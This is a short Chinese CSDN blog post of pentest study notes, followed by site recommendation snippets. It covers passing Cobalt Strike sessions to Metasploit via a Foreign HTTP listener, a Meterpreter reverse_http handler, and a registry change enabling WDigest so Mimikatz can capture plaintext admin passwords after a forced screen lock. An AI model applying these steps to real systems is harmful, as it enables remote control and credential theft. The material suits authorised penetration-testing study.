cs与msf权限传递,以及mimikatz抓取win2012明文密码

最新推荐文章于 2024-08-03 17:01:07 发布
最新推荐文章于 2024-08-03 17:01:07 发布
阅读量149 收藏
点赞数 3
文章标签: 学习 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64998040/article/details/139996647
版权

CS到MSF的权限传递

1. 在CS服务器上创建一个Foreign HTTP监听器,设置监听的IP和端口为MSF监听的IP和端口。
2. 在CS客户端上执行新建会话,并选择之前创建的Foreign HTTP监听器。
3. 如果一切设置正确,MSF界面上将显示新的会话,表示权限传递成功。

 设置监听端口

use exploit/multi/hander
set payload windows/meterpreter/reverse_http
set lport 4444
exploit

mimikatz抓取明文密码

现在windows缓存表不存在明文密码,所以抓取明文密码的步骤为:

手工修改注册表

强制锁屏

等待管理员重新登录

修改注册表 

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

m0_64998040
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
csmsf权限传递以及mimikatz抓取win2012明文密码
huizhaohaha的博客
05-25 793
我查找过资料得出,Cobalt Strike 的前身是 Armitage,而 Armitage 又可以理解为 Metasploit Framework 的图形界面版,因此 Cobalt Strike 与 Metasploit Framework 在很多地方都是兼容的,所以我们便可以将 Metasploit Framework 攻击产生的会话传递到 Cobalt Strike 上,同样的 Cobalt Strike 的会话也能够传递到 Metasploit Framework。
csmsf权限传递mimikatz抓取win2012明文密码
qq_64951792的博客
06-27 650
cobaltstrike,msf
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
本课程重点讲解了如何利用Metasploit(MSF)框架进行渗透测试,通过Web传递的方式获取靶机权限。以下是详细的知识点解析: 1. **Metasploit框架**:Metasploit是一款开源的安全漏洞检测工具,它包含了大量的漏洞...
通信与网络中的MSF基于组件的业务框架
11-14
MSF业务框架的目标是通过明确的接口定义,促进组件间以及组件与代理之间的松耦合,从而提高业务的可维护性和可扩展性。这种架构允许开发人员专注于单个组件的功能,同时确保整体业务流程的顺畅。此外,通过解耦,...
基础电子中的MSF业务框架与IMS的关系
11-14
MSF(Method for System Specification and Development,系统规范与开发方法)是一种在电信行业中广泛采用的业务框架,它旨在提供一个高效、结构化的开发过程,以适应不断变化的市场需求和技术创新。MSF的核心是...
Msf攻击Win7
07-09
总的来说,Msf攻击Win7涉及到的信息安全实践包括:漏洞扫描(使用Nessus)、漏洞利用(使用Metasploit)以及对目标系统的远程控制。在整个过程中,安全测试者必须遵守合法授权和道德规范,仅用于合法的测试目的。
通信与网络中的MSF250的DS1/E1信号格式
12-10
MSF250是一种多业务成帧芯片,其主要功能在于处理通信网络中的DS1/E1信号格式。DS1(T1)和E1(欧洲的T1版本)是数字语音和数据通信的标准,通常用于将多个较低速率的信号(如DS0,每个24kbps)复用成更高速率的链路...
学习笔记】Day 2
Akiiiira的博客
08-03 576
1、inversionnet_train_light 试运行——未成功2、DL-FWI基础入门培训-1,2,以及作业1的完成学习目的:进一步认识 “通过全波形反演探测地震数据” 这一系统。内容摘要(1)“全波形反演” 概述A. 关于正演与反演的逻辑B. FWI的数学表示C. FWI的端到端深度学习解释D. DL-FWI的优势E. DL-FWI的基本发展和分类F. 地震数据 (Seismic Data) 是什么样的?G. 速度模型 (Velocity Model) 是什么。
接口测试学习笔记1
weixin_53666393的博客
08-03 772
同时也像白盒测试那样,检查程序的代码,但这种检查不像白盒测试那样详细、完整,一般只对程序模块之间的调用、核心代码进行检查,在集成测试时经常采用,一般也是程序员大量采用。现在企业说的接口测试,一般指的是Web接口测试或Http接口测试,主要指的是基于B/S架构的接口测试(B/S架构主要基于HTTP 超文本传输协议,所以也叫HTTP接口测试)对请求对象(网页、文件、图片...)进行的操作,就是一些命令,程序员在编程的时候使用,在接口文档中会指明,测试人员测试接口的时候,按照说明选择正确的方法。
安全基础学习-keil调试汇编代码
小夭的博客
07-31 789
初始目的是为了通过汇编编写CRC功能。但是基础为0,所以目前从搭建工程开始记录。大佬绕路。
机械学习—零基础学习日志(高数18——无穷小与无穷大)
AI_freshfish的博客
08-01 558
这里可以记住,无穷小有一个特殊,那就是零。零是最高阶的无穷小,且零是唯一一个常数无穷小。张宇老师还是使用了超实数概念来讲解无穷小。其实是利于理解的,但希望大家接触新概念过程不要太抗拒。数学概念理解,其实可以借用生活概念。张宇老师这里把1除以无穷小,理解成把1分为若干个无穷小。所以得到的就是无穷大。1除以超实数所以得到超实数的结果。
【C++】构造函数的深入学习
weixin_60546365的博客
07-30 436
所有对象共享同一份数据 -- 你改了别人用的就是改过的数据。类中声明,类外初始化 -- 必须要有一个初始值否则没法用。所有对象共享同一个函数,类外访问不到私有静态函数。静态成员函数只能访问静态成员变量。静态成员变量访问权限:在Private作用域下访问,出了这个类不可以访问。分配内存 -- 生成了exe程序,还没有双击运行之前已经分配在全局区中。语法:构造函数():属性1(值1),属性2(值2)...{ }先构造A再构造B,先析构B再析构A(先进后出LIFO)C++提供初始化列表语法用来初始化属性。
计算机网络学习:TCP握手&挥手&强制连接中断
最新发布
qq_42824983的博客
08-03 642
TCP三次握手&四次挥手&RST强制中断连接的报文情况
编程的魅力、发展历程、核心要素、学习路径以及它对个人成长和社会进步的深远影响
z86666610的博客
08-02 396
进入21世纪,随着互联网的普及和移动设备的兴起,编程语言更加多样化,如Python、JavaScript等,它们以其简洁易学的特点吸引了大量初学者。同时,人工智能、大数据、云计算等新兴技术的快速发展,更是将编程推向了新的高度,使得编程成为推动社会进步的重要力量。编程的魅力,在于它让我们能够将自己的想法直接转化为现实,体验到从无到有的创造过程。本文将深入探讨编程的魅力、发展历程、核心要素、学习路径以及它对个人成长和社会进步的深远影响,旨在为读者勾勒出一幅全面而生动的编程世界图景。
CSS学习 - 选择器
Aaron121314的博客
08-03 479
伪类是选择器的一种,它用于选择处于特定状态的元素,比如当它们是这一类型的第一个元素时,或者是当鼠标指针悬浮在元素上面的时候。它们表现得会像是你向你的文档的某个部分应用了一个类一样,帮你在你的标记文本中减少多余的类,让你的代码更灵活、更易于维护。没有了这个标记的话,值会按照文档语言对大小写的处理方式,进行匹配——HTML 中是大小写敏感的。以上是基本选择器的用法,可以用来实现各种样式,但是为了使用简便和优化,还要学习一些进阶的选择器。的属性的元素,其值的字符串中的任何地方,至少出现了一次。
学习大数据DAY30 python基础语法3
shh2000424的博客
08-02 811
上机练习5的作业我昨天就写完了,但是因为它是今天的作业,我就今天发咯。按行作为分隔符条件,返回所有行组成的列表(每行内容是一个元素)今天写的代码比较多,但是整理一下思路还是不难写的。检测到一个错误时,解释器就无法继续执行(程序。了,反而出现了一些错误提示,这就是所谓的异常。方法将任何字符串写入打开的文件,换行符。方法则是读取所有行,一次性全部读出,取款机程序重新执行数据没有保存。文件以字典的形式存储在列表里。语句抛出一个指定的异常。
学习笔记——交通安全分析17
你好!
08-02 349
#随着上一轮SPSS学习完成之后,本人又开始了新教材《交通安全分析》的学习 #整理过程不易,喜欢UP就点个免费的关注趴 #本期内容接上一期16笔记
Python基础学习笔记(二)
执笔写JAVA
08-02 599
python学习笔记第二阶段,程序结构、异常处理、函数式编程、生成器、迭代器、IO等。
内网MSF基础:PostgreSQL配置与权限管理教程
本篇文章主要介绍了在内网环境中使用Metasploit Framework (MSF)进行基础操作和配置的过程。MSF是一个广泛应用于渗透测试和网络安全的开源工具集,本文首先着重于如何在内网环境中设置和管理PostgreSQL数据库,因为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值